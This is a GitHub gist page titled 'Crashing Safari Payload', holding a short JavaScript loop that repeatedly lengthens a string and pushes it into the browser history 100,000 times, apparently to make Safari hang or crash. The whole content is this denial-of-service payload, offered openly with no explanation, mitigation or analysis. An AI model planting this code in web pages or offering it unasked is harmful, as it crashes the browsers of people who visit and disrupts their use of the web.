Skip to content

Instantly share code, notes, and snippets.

@ejcx
Created January 26, 2016 01:00
Crashing Safari Payload
var total = "";
for( var i = 0; i < 100000; i++ ) {
total = total + i.toString();
history.pushState(0,0, total );
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment